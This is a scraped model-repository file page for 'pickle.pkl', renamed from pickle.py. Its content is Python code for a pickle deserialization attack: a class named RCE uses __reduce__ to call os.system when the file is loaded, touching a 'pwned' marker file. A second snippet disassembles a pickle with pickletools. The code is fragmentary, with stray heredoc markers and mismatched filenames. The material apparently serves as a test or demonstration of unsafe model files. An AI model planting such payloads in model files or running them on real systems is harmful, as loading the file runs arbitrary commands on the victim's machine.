srimanthk
/

code42

Model card Files Files and versions

code42 / pickle.pkl

srimanthk's picture

Rename pickle.py to pickle.pkl

42b025b verified 8 days ago

history blame contribute delete

295 Bytes

	import pickle, os
	class RCE:
	def __reduce__(self):
	return (os.system, ("touch /mnt/d/stratacloud/localdisk/pwned",))

	pickle.dump(RCE(), open("model.pkl","wb"))
	EOF

	python - << 'EOF'
	import pickletools

	print("Pickle opcodes detected:")
	pickletools.dis("unsafe_pickle_model.pt")
	EOF